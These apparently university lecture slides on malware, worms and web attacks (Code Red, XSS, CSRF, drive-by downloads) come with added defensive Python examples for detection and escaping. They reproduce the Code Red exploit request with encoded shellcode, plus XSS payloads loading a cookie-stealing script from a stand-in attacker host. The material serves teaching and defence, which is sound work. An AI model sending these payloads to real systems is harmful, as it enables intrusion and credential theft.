Malwares, Worms, and Web Issues
IT443 – Network Security Administration
Instructor: Bo Sheng
Malware
• Computer systems still have many vulnerabilities
• When exposed to the Internet, these vulnerabilities lead to exploitation
• Major issue as computer systems become more ubiquitous
• Malware is a generic term that refers to malicious software
• Terminology
  • Virus: computer program designed to spread (requires human intervention)
  • Worm: does not require human intervention
  • Trojan horse: allows remote access to unauthorized users
  • Adware: shows ads when the application is running
  • Spyware: monitors & collects information to be transmitted to a third party without user knowledge/consent
Threats to Networks
• Motivation evolved from pursuit of fame to financial and political
• Examples
  • BGP hijacking (e.g., the 2008 YouTube hijacking)
  • Viruses, worms and bots are more stealthy today
  • 2008-2009: Conficker infected 2-15 million Windows servers
  • Malware is more prevalent than ever, leading to an underground economy (XSS attacks)
  • “MPack is sold as commercial software (costing $500 to $1,000 US), and is provided by its developers with technical support and regular updates of the software vulnerabilities it exploits.”
Some Interesting Numbers
• Sources
  • “The Business of Rogueware”, PandaLabs, 2010
  • “The Business of Cybercrime”, PandaLabs, 2008
  • “Web Based Attacks”, Symantec, 2009
• Adware industry is worth 2 billion dollars per year
• Malware industry is worth 105 billion dollars per year
• > 80% of the e-mail traffic out there is spam
• 50%-80% of computers connected to the Internet are infected with spyware
• Some people make 20 thousand dollars (!) per month using botnets (i.e., compromised computers)
• A 26 year-old made 20 million dollars with spam before being caught
• 2 billion dollars was lost to phishers four years ago
Online Crime is a Business Now
• Klikparty, 2007
Web Attacks - Trends [Symantec White Paper 08-2/09]
• Drive-by download from mainstream websites
• Dynamic and highly obfuscated malware
• Browser plugins
• Misleading applications
• SQL injection on mainstream websites
• Malvertisements: users redirected to malicious websites
• Exponential increase in unique and targeted malware samples
Web Attacks – Sequence of Events
• Breaking into legitimate websites to post malware
• Attacking end user machines
• Leveraging end user machines for malicious activities
Attacking Users' Machines
• Drive-by download sequence of events
  • Compromise a legitimate website
  • User visits; if a multimedia plugin is out of date, the machine can be compromised
  • Redirect to a malicious website, which obtains information such as web browser, OS and plugins
  • Serve malicious multimedia data to compromise the machine
  • Steal personal information
• Software vulnerabilities [report indicates 600M browsers insecure]
• Web attack toolkits (off the shelf)
  • Neosploit, Mpack, IcePack, El Fiesta, Adpack
  • Efficient: profiling the victim, timing (below the radar), geographic variances, old to new exploits, brute force, playing the odds, obfuscation, polymorphic malware/URLs
  • Obfuscation using encryption is difficult to detect
History of Worms
• Worms self-replicate by exploiting vulnerabilities in remote machines
  • Apps running on some port
  • Vulnerabilities are purchased for malicious and legitimate use
• Worms carry a payload to take actions
• One of the first worms to spread extensively was written by Robert Morris, 1988
  • Uses fingerd and sendmail buffer overflows, rsh, weak passwords
  • Around 10% of Internet hosts infected
  • Convicted: 3 years of probation, 400 hours of community service work
• Many worms since then, with a peak during the 2000-2004 period
• Today worms are more stealthy
Code Red
• “How to Own the Internet in Your Spare Time”, S. Staniford, V. Paxson, N. Weaver, USENIX Security 2002.
• Date: July 13th, 2001 / July 19th, 2001
• Exploit
  • Microsoft IIS web servers using the .ida vulnerability [published June 18, 2001]
• Payload
  • Website defacement
  • DDoS a list of web sites including www.whitehouse.gov
• Spreading
  • 99 threads: each generates a random IP address and infects
  • 100th thread: defaces the website
Code Red CRv1 GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
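The CRv1 request above has a fixed shape (a long run of one padding character after `/default.ida?`, then `%uXXXX`-encoded shellcode), which is what intrusion detection and log review keyed on. The following detector, an added example and not part of the lecture, parses Common Log Format lines and flags requests matching that shape; the log lines and IP addresses are constructed.

```python
import re
from typing import Dict, List, Optional

# Common Log Format line: client, identity, user, [timestamp], "request", status, bytes.
LOG_LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" (?P<status>\d{3})'
)

# Code Red's .ida request: /default.ida? followed by a long run (>= 100) of one repeated
# padding character and then %uXXXX-encoded shellcode, as in the CRv1 request on the slide.
CODE_RED_RE = re.compile(r'^/default\.ida\?(.)\1{99,}(?:%u[0-9a-fA-F]{4})+')

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one CLF line, or None if it does not parse."""
    m = LOG_LINE_RE.match(line)
    return m.groupdict() if m else None

def is_code_red_request(target: str) -> bool:
    return CODE_RED_RE.match(target) is not None

def detect_code_red(log_text: str) -> List[Dict[str, str]]:
    """Return one record per log line whose request matches the Code Red signature."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "GET" and is_code_red_request(rec["target"]):
            # A match shows an infection attempt; the status alone does not say whether
            # the host was actually exploited (a patched server still logs the request).
            hits.append({"src": rec["src"], "ts": rec["ts"], "status": rec["status"]})
    return hits

# Constructed sample log (not real traffic); the middle line reproduces the CRv1 request shape.
CODE_RED_TARGET = ("/default.ida?" + "N" * 224
                   + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
                   + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [19/Jul/2001:10:02:11 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [19/Jul/2001:10:02:13 -0400] "GET ' + CODE_RED_TARGET + ' HTTP/1.0" 200 0',
    '10.0.0.7 - - [19/Jul/2001:10:02:20 -0400] "GET /default.ida HTTP/1.0" 404 210',
])

if __name__ == "__main__":
    for hit in detect_code_red(SAMPLE_LOG):
        print(f"Code Red probe from {hit['src']} at {hit['ts']} (status {hit['status']})")
```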
Cross-site Scripting (XSS)
• Vulnerability commonly found in web applications
• Attackers inject malicious code (e.g. JavaScript programs) into the victim’s web browser
  • Steal the victim’s credentials, such as cookies
  • Bypass the access control policies
Cross-site Scripting (XSS)
• Bob has a legitimate web site, and Alice is a registered user
• Bob’s web site allows queries like http://bobssite.org?q=search_term
• The attacker finds the XSS vulnerability: http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script>
• Non-persistent
  • The attacker emails Alice with a link: http://bobssite.org?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"
• Persistent
  • The attacker posts a comment: I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js">
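Both the reflected (non-persistent) and stored (persistent) cases above come down to the same defect: Bob's site copies attacker-controlled text into the HTML it sends Alice. The following Python, an added example rather than code from the lecture, extracts the `q` parameter from the slide's probe URL, renders it the vulnerable way and the escaped way, and applies the same output escaping to the stored comment; the function names are this example's own.

```python
import html
from urllib.parse import unquote_plus, urlsplit

def query_param(url: str, name: str) -> str:
    """Extract one query parameter the way Bob's server sees it (percent-decoding applied)."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == name:
            return unquote_plus(value)
    return ""

def render_results_vulnerable(term: str) -> str:
    # Reflects the search term into the page as-is: whatever Alice's link carried runs in her browser.
    return f"<h1>Results for: {term}</h1>"

def render_results_safe(term: str) -> str:
    # HTML-escapes the term, so < > & " ' become entities and the browser shows text, not markup.
    return f"<h1>Results for: {html.escape(term, quote=True)}</h1>"

def render_comments_safe(comments: list) -> str:
    # The stored (persistent) case: escape on output, regardless of who posted the comment.
    return "".join(f"<p>{html.escape(c, quote=True)}</p>" for c in comments)

def contains_script_tag(page: str) -> bool:
    """Crude check: does the rendered page contain a live <script ...> tag?"""
    return "<script" in page.lower()

# URL and comment taken from the slide (mallorysevilsite.com is the slide's example host).
PROBE_URL = "http://bobssite.org?q=<script%20type='text/javascript'>alert('xss');</script>"
STORED_COMMENT = ("I love the puppies in this story! They're so cute!"
                  '<script src="http://mallorysevilsite.com/authstealer.js">')

if __name__ == "__main__":
    term = query_param(PROBE_URL, "q")
    print("vulnerable:", render_results_vulnerable(term))
    print("escaped:   ", render_results_safe(term))
    print("comment:   ", render_comments_safe([STORED_COMMENT]))
```

`html.escape` is the right encoder for HTML text and quoted attribute values; a value placed inside a script block or a URL needs that context's own encoding instead.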
Cross-Site Request Forgery
• The victim user logs into the trusted site using his username and password, and thus creates a new session.
• The trusted site stores the session identifier for the session in a cookie in the victim user’s web browser.
• The victim user visits a malicious site.
• The malicious site’s web page sends a request to the trusted site from the victim user’s browser.
• The web browser automatically attaches the session cookie to the malicious request because it is targeted for the trusted site.
• The trusted site processes the malicious request forged by the attacker web site.
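The sequence above, modelled in Python as an added example (not code from the lecture): a browser object attaches cookies by target site exactly as in step 5, and the trusted site's handler is run once checking the cookie alone and once also requiring a per-session token that only the site's own pages can carry. Host names, the "change e-mail" action and all method names are this example's assumptions.

```python
import hmac
import secrets

class TrustedSite:
    """Cookie sessions plus a per-session CSRF token (synchronizer token pattern)."""
    def __init__(self):
        self.sessions = {}   # session id -> {"user": ..., "csrf": ...}
        self.emails = {}     # user -> e-mail address on file

    def login(self, user):
        sid = secrets.token_urlsafe(16)   # returned to the browser as Set-Cookie: session=<sid>
        self.sessions[sid] = {"user": user, "csrf": secrets.token_urlsafe(16)}
        return sid

    def csrf_token_for(self, sid):
        return self.sessions[sid]["csrf"]   # embedded only in the site's own forms

    def change_email(self, req, require_token):
        """require_token=False is the vulnerable handler: a valid session cookie is all it checks."""
        sess = self.sessions.get(req["cookies"].get("session"))
        if sess is None:
            return 401
        # A page on another origin cannot read the token (same-origin policy), so it cannot send it.
        if require_token and not hmac.compare_digest(req["form"].get("csrf", ""), sess["csrf"]):
            return 403
        self.emails[sess["user"]] = req["form"]["email"]
        return 200

class Browser:
    """Attaches cookies by target site, not by the origin of the page that made the request (step 5)."""
    def __init__(self):
        self.jar = {}   # site -> {cookie name: value}

    def post(self, target_site, form):
        return {"cookies": dict(self.jar.get(target_site, {})), "form": dict(form)}

def run_scenario():
    """The slide's sequence: login, session cookie stored, forged POST from a malicious page."""
    site, browser = TrustedSite(), Browser()
    sid = site.login("victim")
    browser.jar["trusted.example"] = {"session": sid}   # step 2: session id kept in a cookie
    # Step 4: the malicious page submits a form to the trusted site; the browser adds the cookie.
    forged = browser.post("trusted.example", {"email": "attacker@malicious.example"})
    results = {"vulnerable": site.change_email(forged, require_token=False),   # 200: cookie sufficed
               "protected_forged": site.change_email(forged, require_token=True)}  # 403: no token
    legit = browser.post("trusted.example", {"email": "victim@home.example", "csrf": site.csrf_token_for(sid)})
    results["protected_legit"] = site.change_email(legit, require_token=True)   # 200: token matches
    results["email_on_file"] = site.emails["victim"]
    return results
```

A `SameSite` cookie attribute or an `Origin` header check adds a second, independent layer; the token alone already defeats the flow on the slide because step 4's page never learns it.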
Legitimate Websites
• Shift from pornographic/pirateware websites to legitimate websites
• Why? More users, less suspicion
• In 2008, Symantec observed Web attacks from 808,000 unique domains, many of which are mainstream websites
• Complex websites with content from many sources (ads), dynamically generated, running on user machines, requiring plugins
• How?
  • SQL injection (inject malicious HTML code into the backend database and serve it to the user). Trojan.Asprox automates the process: 1) search the web for vulnerable websites, 2) inject an invisible iframe pointing to malicious pages
  • Malicious advertisements: hard to validate given the amount of ads; hard to detect, as the ads appear with low frequency; usually the ad is OK but redirects to a malicious website
  • Search engine redirection, attacks on the backend of virtual hosting, vulnerabilities in the web server or forum server, cross-site scripting attacks
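The invisible iframe that Trojan.Asprox injects (and the compromised-site first step of the drive-by sequence earlier) leaves a detectable trace in the served HTML: a frame that is hidden and loads from a host other than the site itself. The scanner below is an added example, not code from the lecture or from Symantec; the page content and host names are constructed, and the heuristics (zero size or display:none, off-site src) are this example's own choice.

```python
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlsplit

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are both visually hidden and point off-site."""
    def __init__(self, site_host: str):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        raw = {k: (v or "") for k, v in attrs}          # attribute names are already lowercased
        norm = {k: v.strip().lower() for k, v in raw.items()}
        style = norm.get("style", "").replace(" ", "")
        hidden = (norm.get("width") in ("0", "1", "0px", "1px")
                  or norm.get("height") in ("0", "1", "0px", "1px")
                  or "display:none" in style or "visibility:hidden" in style)
        src = raw.get("src", "")
        # A src with no host is served by the site itself; anything else is off-site.
        src_host = (urlsplit(src).hostname or self.site_host).lower()
        if hidden and src_host != self.site_host:
            self.findings.append(src)

def find_hidden_iframes(page_html: str, site_host: str) -> List[str]:
    finder = HiddenIframeFinder(site_host)
    finder.feed(page_html)
    return finder.findings

# Constructed page: normal content, a legitimate visible embed, a hidden same-site widget,
# and one injected hidden off-site iframe (placeholder host, not a real indicator).
SAMPLE_PAGE = """<html><body>
<h1>Daily News</h1>
<iframe src="https://video.partner.example/player?id=42" width="640" height="360"></iframe>
<p>Story text...</p>
<iframe src="http://attacker-placeholder.example/in.php" width=0 height=0 style="display: none"></iframe>
<iframe src="/local/widget.html" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for src in find_hidden_iframes(SAMPLE_PAGE, "news.example"):
        print("hidden off-site iframe:", src)
```

The same check belongs in a post-deploy integrity scan of the site's own pages, since the injection lands in the database and shows up only in rendered output.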